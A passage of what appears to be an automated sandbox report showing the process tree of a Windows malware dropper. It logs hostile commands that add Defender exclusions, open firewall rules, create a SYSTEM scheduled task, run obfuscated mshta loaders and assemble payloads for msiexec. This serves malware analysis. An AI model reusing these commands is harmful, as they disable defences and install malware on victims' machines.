        "C:\Users\Admin\Pictures\Adobe Films\Fh1FtEXRx3twQiwDDtpQMvtC.exe"
        6⤵
        
        PID:5160
        
        C:\Users\Admin\Pictures\Adobe Films\Fh1FtEXRx3twQiwDDtpQMvtC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Fh1FtEXRx3twQiwDDtpQMvtC.exe"
        7⤵
        
        PID:5404
      - C:\Users\Admin\Pictures\Adobe Films\QHAG7t0pcs3gyiBpT5DfFS5D.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\QHAG7t0pcs3gyiBpT5DfFS5D.exe"
        6⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 312
        7⤵
        Program crash
        
        PID:5368
      - C:\Users\Admin\Pictures\Adobe Films\xRNOSwZ9gZbw8CyLdLzY1O9_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\xRNOSwZ9gZbw8CyLdLzY1O9_.exe"
        6⤵
        
        PID:5312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        7⤵
        
        PID:496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        7⤵
        
        PID:3748
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:5844
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
        7⤵
        Creates scheduled task(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:1920
        
        C:\Windows\System\svchost.exe
        
        "C:\Windows\System\svchost.exe" formal
        7⤵
        
        PID:6284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        8⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        8⤵
        
        PID:6272
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:5560
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:872
      - C:\Users\Admin\Pictures\Adobe Films\2hHBRt8xNwhGPMVyub2Lm0Jv.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\2hHBRt8xNwhGPMVyub2Lm0Jv.exe"
        6⤵
        
        PID:5292
      - C:\Users\Admin\Pictures\Adobe Films\KJFi9OsbvVS8mCKyZTe0hrhm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\KJFi9OsbvVS8mCKyZTe0hrhm.exe"
        6⤵
        
        PID:5336
        
        C:\Users\Admin\Pictures\Adobe Films\KJFi9OsbvVS8mCKyZTe0hrhm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\KJFi9OsbvVS8mCKyZTe0hrhm.exe"
        7⤵
        
        PID:5428
      - C:\Users\Admin\Pictures\Adobe Films\uzOxXYUv7zjcmJBjJTiWmLzB.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\uzOxXYUv7zjcmJBjJTiWmLzB.exe"
        6⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\uzOxXYUv7zjcmJBjJTiWmLzB.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\uzOxXYUv7zjcmJBjJTiWmLzB.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        7⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\uzOxXYUv7zjcmJBjJTiWmLzB.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\uzOxXYUv7zjcmJBjJTiWmLzB.exe" ) do taskkill -im "%~NxK" -F
        8⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
        
        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
        9⤵
        
        PID:6452
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        10⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        11⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
        10⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
        11⤵
        
        PID:7620
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        12⤵
        
        PID:7876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
        12⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -y .\N3V4H8H.SXY
        12⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "uzOxXYUv7zjcmJBjJTiWmLzB.exe" -F
        9⤵
        Kills process with taskkill
        
        PID:6688
      - C:\Users\Admin\Pictures\Adobe Films\BhVKcDbeUG3FFg85PdUFKXL4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\BhVKcDbeUG3FFg85PdUFKXL4.exe"
        6⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "BhVKcDbeUG3FFg85PdUFKXL4.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\BhVKcDbeUG3FFg85PdUFKXL4.exe" & exit
        7⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "BhVKcDbeUG3FFg85PdUFKXL4.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:6756
      - C:\Users\Admin\Pictures\Adobe Films\_5AwV8MGlamvqATtWBHrHPRw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\_5AwV8MGlamvqATtWBHrHPRw.exe"
        6⤵
        
        PID:6056
      - C:\Users\Admin\Pictures\Adobe Films\Qp3CsfMRi_aPeXd3fY1Oj6WX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Qp3CsfMRi_aPeXd3fY1Oj6WX.exe"
        6⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 400
        7⤵
        Program crash
        
        PID:1044
      - C:\Users\Admin\Pictures\Adobe Films\nDE6GCxXeCpF3m5Z568lWIES.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nDE6GCxXeCpF3m5Z568lWIES.exe"
        6⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:6800
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:7036
      - C:\Users\Admin\Pictures\Adobe Films\bRvj0B4bnxQll1IlPoSe8E4x.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\bRvj0B4bnxQll1IlPoSe8E4x.exe"
        6⤵
        
        PID:1236
      - C:\Users\Admin\Pictures\Adobe Films\IPU19y0xAQVazxDWFHOlGUHm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\IPU19y0xAQVazxDWFHOlGUHm.exe"
        6⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\IPU19y0xAQVazxDWFHOlGUHm.exe" & exit
        7⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:5312
      - C:\Users\Admin\Pictures\Adobe Films\uP9KXmwfQVWyCi1wYLsuHBxo.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\uP9KXmwfQVWyCi1wYLsuHBxo.exe"
        6⤵
        
        PID:5188
      - C:\Users\Admin\Pictures\Adobe Films\ar3kRoTq1C8YuDNVhP51q5bO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ar3kRoTq1C8YuDNVhP51q5bO.exe"
        6⤵
        
        PID:4728
      - C:\Users\Admin\Pictures\Adobe Films\EgnflB0ZoxOCaXiie4ZZCUyp.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EgnflB0ZoxOCaXiie4ZZCUyp.exe"
        6⤵
        
        PID:4236
      - C:\Users\Admin\Pictures\Adobe Films\XtrJf_FLNVQycgEoiMjB8j4p.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\XtrJf_FLNVQycgEoiMjB8j4p.exe"
        6⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\XtrJf_FLNVQycgEoiMjB8j4p.exe" & exit
        7⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:5984
      - C:\Users\Admin\Pictures\Adobe Films\gJ6FAiO3q_aVXxql2HB6Mwaw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gJ6FAiO3q_aVXxql2HB6Mwaw.exe"
        6⤵
        
        PID:3764
      - C:\Users\Admin\Pictures\Adobe Films\ZsbppNziu_noy5EYdcaYcyKF.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ZsbppNziu_noy5EYdcaYcyKF.exe"
        6⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\1984410.exe
        
        "C:\Users\Admin\AppData\Local\1984410.exe"
        8⤵
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\6594567.exe
        
        "C:\Users\Admin\AppData\Local\6594567.exe"
        8⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\4007276.exe
        
        "C:\Users\Admin\AppData\Local\4007276.exe"
        8⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\4007276.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\4007276.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        9⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\4007276.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\4007276.exe" ) do taskkill -f -Im "%~NXZ"
        10⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "4007276.exe"
        11⤵
        Kills process with taskkill
        
        PID:7212
        
        C:\Users\Admin\AppData\Local\8870312.exe
        
        "C:\Users\Admin\AppData\Local\8870312.exe"
        8⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\949459.exe
        
        "C:\Users\Admin\AppData\Local\949459.exe"
        8⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"
        7⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"
        7⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:5536
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:5540
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:8188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        13⤵
        
        PID:7796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        13⤵
        
        PID:8664
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        
        PID:7012
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\is-AVK9E.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AVK9E.tmp\setup.tmp" /SL5="$204EA,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        
        PID:996
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        9⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\is-IAV6K.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IAV6K.tmp\setup.tmp" /SL5="$603F6,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        10⤵
        
        PID:3048
        
        C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
        11⤵
        
        PID:5920
        
        C:\7955a0f7041e1cb2e33a\Setup.exe
        
        C:\7955a0f7041e1cb2e33a\\Setup.exe /q /norestart /x86 /x64 /web
        12⤵
        
        PID:3496
        
        C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
        11⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\is-D06DK.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D06DK.tmp\postback.exe" ss1
        11⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
        
        "C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
        7⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:5344
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        9⤵
        
        PID:7672
        
        C:\Users\Admin\AppData\Local\Temp\chrome1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
        7⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\chrome update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
        7⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        7⤵
        
        PID:6608
      - C:\Users\Admin\Pictures\Adobe Films\6gW5YuxUsBg1Y_80X7fxjpXa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6gW5YuxUsBg1Y_80X7fxjpXa.exe"
        6⤵
        
        PID:4160
        
        C:\Users\Admin\Pictures\Adobe Films\6gW5YuxUsBg1Y_80X7fxjpXa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6gW5YuxUsBg1Y_80X7fxjpXa.exe"
        7⤵
        
        PID:4328
        
        C:\Users\Admin\Pictures\Adobe Films\6gW5YuxUsBg1Y_80X7fxjpXa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6gW5YuxUsBg1Y_80X7fxjpXa.exe"
        7⤵
        
        PID:6196
      - C:\Users\Admin\Pictures\Adobe Films\DzPorAm7_cUUd_CxNzK3EibZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\DzPorAm7_cUUd_CxNzK3EibZ.exe"
        6⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
        
        C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
        7⤵
        
        PID:5840
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Roaming\Underdress.exe
        
        C:\Users\Admin\AppData\Roaming\Underdress.exe
        7⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"
        8⤵
        
        PID:6036
      - C:\Users\Admin\Pictures\Adobe Films\_yfyUq31EXVMImN4SV33tGPD.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\_yfyUq31EXVMImN4SV33tGPD.exe"
        6⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\_yfyUq31EXVMImN4SV33tGPD.exe" & exit
        7⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:6044
      - C:\Users\Admin\Pictures\Adobe Films\F1xDq8VKMunkOrmy3OjroO5a.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\F1xDq8VKMunkOrmy3OjroO5a.exe"
        6⤵
        
        PID:6292
      - C:\Users\Admin\Pictures\Adobe Films\9HrVw9Co24XeA1m7VrmauGWu.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\9HrVw9Co24XeA1m7VrmauGWu.exe"
        6⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        7⤵
        
        PID:6928
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        8⤵
        
        PID:7776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20d8f1968de62f282.exe
      4⤵
      PID:3376
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20d8f1968de62f282.exe
        
        Tue20d8f1968de62f282.exe
        5⤵
        Executes dropped EXE
        
        PID:2144
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2144 -s 1436
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue203dd57461.exe
      4⤵
      PID:868
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue203dd57461.exe
        
        Tue203dd57461.exe
        5⤵
        Executes dropped EXE
        
        PID:3048
      - C:\Users\Admin\AppData\Roaming\1863108.exe
        
        "C:\Users\Admin\AppData\Roaming\1863108.exe"
        6⤵
        Executes dropped EXE
        
        PID:4132
      - C:\Users\Admin\AppData\Roaming\8864439.exe
        
        "C:\Users\Admin\AppData\Roaming\8864439.exe"
        6⤵
        Executes dropped EXE
        
        PID:4368
      - C:\Users\Admin\AppData\Roaming\7806056.exe
        
        "C:\Users\Admin\AppData\Roaming\7806056.exe"
        6⤵
        
        PID:4700
      - C:\Users\Admin\AppData\Roaming\953646.exe
        
        "C:\Users\Admin\AppData\Roaming\953646.exe"
        6⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:6068
      - C:\Users\Admin\AppData\Roaming\2865433.exe
        
        "C:\Users\Admin\AppData\Roaming\2865433.exe"
        6⤵
        
        PID:4512
      - C:\Users\Admin\AppData\Roaming\7531648.exe
        
        "C:\Users\Admin\AppData\Roaming\7531648.exe"
        6⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\7531648.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\7531648.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        7⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\7531648.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\7531648.exe" ) do taskkill -f -Im "%~NXZ"
        8⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
        
        ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
        9⤵
        
        PID:704
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        10⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\cmd.exe
        
